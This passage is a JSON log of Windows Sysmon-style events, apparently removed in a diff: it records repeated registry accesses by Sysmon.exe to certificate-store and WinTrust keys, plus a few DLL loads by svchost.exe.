"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.OneCore.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WsmAuto.dll", - "image_path": "C:\\Windows\\System32\\WsmAuto.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 